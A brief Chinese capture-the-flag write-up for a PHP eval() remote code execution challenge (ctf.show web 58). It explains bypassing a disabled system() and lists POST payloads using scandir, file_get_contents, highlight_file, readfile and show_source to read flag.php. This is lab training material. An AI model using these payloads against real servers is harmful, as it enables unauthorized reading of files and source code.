ctf show web入门58

这是一道远程代码执行漏洞,我们先查看源代码

发现这里是使用POST方式传参给$c,再通过eval()函数来执行输入的内容

我们可以打开hackbar来进行POST提交

这里提示我们system()函数被禁用了,我们尝试其他命令

我们可以用 scandir() 函数来读取目录,并用 print_r() 或 var_dump() 打印出来

发现有一个flag.php我们尝试查看该目录中的内容

c=echo file_get_contents('flag.php');

c=highlight_file('flag.php');

c=readfile('flag.php');

c=show_source('flag.php');

相关推荐
vipbic5 分钟前
中后台越做越乱后,我用插件化把它救回来了
前端·vue.js
Hyyy10 分钟前
Computer Use 适合做什么,不适合做什么——一次真实使用后的思考
前端
小和尚同志37 分钟前
前端 AI 单元测试思考与落地
前端·人工智能·aigc
invicinble2 小时前
c端系统,其实更像一个信息展示平台
前端
李姆斯3 小时前
管理是否可以被完全量化
前端·产品经理·团队管理
疯狂打码的少年3 小时前
【软件工程】软件开发模型:增量模型与迭代模型
笔记·软件工程
Generalzy3 小时前
从本地 Demo 到生产级检索:Milvus 学习笔记(3)
笔记·学习·milvus
名字还没想好☜3 小时前
Next.js 中间件实战:鉴权、重定向与 A/B 分流
开发语言·前端·javascript·中间件·react·next.js
广州灵眸科技有限公司3 小时前
瑞芯微RV1126B开发板(EASY-EAI-PI2) INI文件操作
java·前端·javascript·网络·人工智能
江华森4 小时前
Web 开发基础:HTTP 与 REST
前端·网络协议·http